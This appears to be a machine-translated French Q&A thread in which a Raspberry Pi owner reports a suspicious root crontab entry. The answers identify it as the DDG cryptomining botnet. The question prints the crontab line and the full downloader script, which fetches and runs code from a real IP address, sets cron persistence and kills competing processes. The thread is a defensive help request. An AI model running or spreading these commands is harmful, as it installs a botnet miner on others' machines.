web-dev-qa-db-fra.com

Entrée crontab suspecte exécutant «xribfa4» toutes les 15 minutes

Je voulais ajouter quelque chose à mon fichier crontab racine sur mon Raspberry Pi, et j'ai trouvé une entrée qui me semble suspecte, la recherche de parties sur Google n'a rien révélé.

Entrée Crontab:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

Le contenu de http://103.219.112.66:8000/i.sh sont:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

Mes connaissances Linux sont limitées, mais il me semble que le téléchargement de fichiers binaires à partir d'un serveur indonésien et leur exécution régulière en tant que root n'est pas quelque chose qui est habituel.

Qu'est-ce que c'est? Que devrais-je faire?

60
Peter Dam

Il s'agit d'un botnet minier DDG, comment cela fonctionne:

  1. exploiter une vulnérabilité RCE
  2. modification de la crontab
  3. télécharger le programme minier approprié (écrit avec go)
  4. démarrer le processus d'extraction

DDG: un botnet minier visant les serveurs de bases de données

SystemdMiner lorsqu'un botnet emprunte l'infrastructure d'un autre botnet

U&L: Comment puis-je tuer les logiciels malveillants minerd sur une instance AWS EC2? (Serveur compromis)

80
GAD3R

Déterminez quels TCP et ports UDP sont réellement nécessaires, puis bloquez tous les autres ports du pare-feu de votre routeur. Peut-être , ces entrées crontab ne réapparaîtront pas.

Vous pouvez voir quels ports sont ouverts et publics en utilisant la fonction Shields Up! sur grc.com .

2
Mike Waters